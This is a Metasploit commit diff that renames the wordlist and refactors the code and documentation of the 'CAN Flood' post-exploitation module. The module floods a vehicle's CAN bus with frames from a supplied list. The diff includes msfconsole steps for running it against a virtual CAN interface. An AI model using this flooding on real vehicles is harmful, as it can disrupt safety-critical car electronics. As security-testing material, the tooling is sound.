Clean up module

rapid7 · Apr 1, 2019 · f5f4c4b · f5f4c4b
1 parent 2afd27a
commit f5f4c4b
Show file tree

Hide file tree

Showing 3 changed files with 37 additions and 24 deletions.
diff --git a/data/wordlists/frameListCanBus.txt → data/wordlists/can_flood_frames.txt b/data/wordlists/frameListCanBus.txt → data/wordlists/can_flood_frames.txt
diff --git a/documentation/modules/post/hardware/automotive/can_flood.md b/documentation/modules/post/hardware/automotive/can_flood.md
@@ -1,13 +1,18 @@
 ## Introduction
+
 CAN Flood is a post-exploitation module that floods a CAN interface for a number of rounds. Both the interface and the number of rounds are to be provided as inputs. An example list of frames also is part of the inputs, and sources the flooding at each round. The module therefore is general as it is parametric in the frame list.
+
 ## Verification Steps
+
 First, start up a virtual CAN bus:
+
 1. `sudo modprobe can`
 2. `sudo modprobe vcan`
 3. `sudo ip link add dev vcan0 type vcan`
 4. `sudo ip link set up vcan0`
 
 Then do the thing:
+
 5. Start `msfconsole`
 6. `use auxiliary/server/local_hwbridge`
 7. `set uripath trycanbus`
@@ -19,21 +24,26 @@ Then do the thing:
 13. `set canbus vcan0`
 14. `set session 1`
 15. `run`
+
 ## Options
+
 **CANBUS**
 Determines which CAN interface to use.
 
 **FRAMELIST**
-Path of the file that contains the list of frames. Default is "/usr/share/metasploit-framework/data/wordlists/frameListCanBus.txt".
+Path of the file that contains the list of frames. Default is "/usr/share/metasploit-framework/data/wordlists/can_flood_frames.txt".
 
 **ROUNDS**
 Number of executed rounds. Default is 200.
 
 **SESSION**
 The session to run this module on.
+
 ## Scenarios
+
 The user must know a list of frames that generate an effect on the car. This is because the module is general as it is parametric in the frame list.
 You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output:
+
 ```
 msf5 > use auxiliary/server/local_hwbridge
 msf5 auxiliary(server/local_hwbridge) > run
@@ -64,4 +74,4 @@ msf5 post(hardware/automotive/can_flood) > run
 
 [*]  -- FLOODING -- 
 [*] Post module execution completed
-```
+```
diff --git a/modules/post/hardware/automotive/can_flood.rb b/modules/post/hardware/automotive/can_flood.rb
@@ -2,38 +2,41 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+
 class MetasploitModule < Msf::Post
+
+  DEFAULT_FRAMELIST = File.join(Msf::Config.data_directory, 'wordlists', 'can_flood_frames.txt')
+
   def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Name' => 'CAN Flood',
-        'Description' => 'Module that floods a CAN interface',
-        'License' => MSF_LICENSE,
-        'Author' => ['Pietro Biondi'],
-        'Platform' => ['hardware'],
-        'SessionTypes' => ['hwbridge']
-      )
-    )
-    register_options(
-      [
-        OptInt.new('ROUNDS', [false, 'Number of executed rounds', 200]),
-        OptString.new('CANBUS', [false, 'CAN interface', nil]),
-        OptString.new('FRAMELIST', [true, 'Path to FRAMELIST', ::File.join(Msf::Config.data_directory, 'wordlists', 'frameListCanBus.txt')])
-      ]
-    )
+    super(update_info(info,
+      'Name'         => 'CAN Flood',
+      'Description'  => 'This module floods a CAN interface with supplied frames.',
+      'Author'       => 'Pietro Biondi',
+      'License'      => MSF_LICENSE,
+      'Platform'     => 'hardware',
+      'SessionTypes' => ['hwbridge']
+    ))
+
+    register_options([
+      OptString.new('CANBUS',    [true, 'CAN interface']),
+      OptString.new('FRAMELIST', [true, 'Path to frame list file', DEFAULT_FRAMELIST]),
+      OptInt.new('ROUNDS',       [true, 'Number of executed rounds', 200])
+    ])
   end
 
   def run
-    vprint_status("Reading frame list file: #{datastore['FRAMELIST']}")
-    unless ::File.exist? datastore['FRAMELIST']
-      print_error "Frame list file '#{datastore['FRAMELIST']}' does not exist"
+    unless File.exist?(datastore['FRAMELIST'])
+      print_error("Frame list file '#{datastore['FRAMELIST']}' does not exist")
       return
     end
+
+    vprint_status("Reading frame list file: #{datastore['FRAMELIST']}")
     frames = File.readlines(datastore['FRAMELIST']).map { |line| line.strip.split('+') }
+
     print_status(' -- FLOODING -- ')
     datastore['ROUNDS'].times do
-      frames.each_index { |i| client.automotive.cansend(datastore['CANBUS'], frames[i][0], frames[i][1]) }
+      frames.each { |frame| client.automotive.cansend(datastore['CANBUS'], frame[0], frame[1]) }
     end
   end
+
 end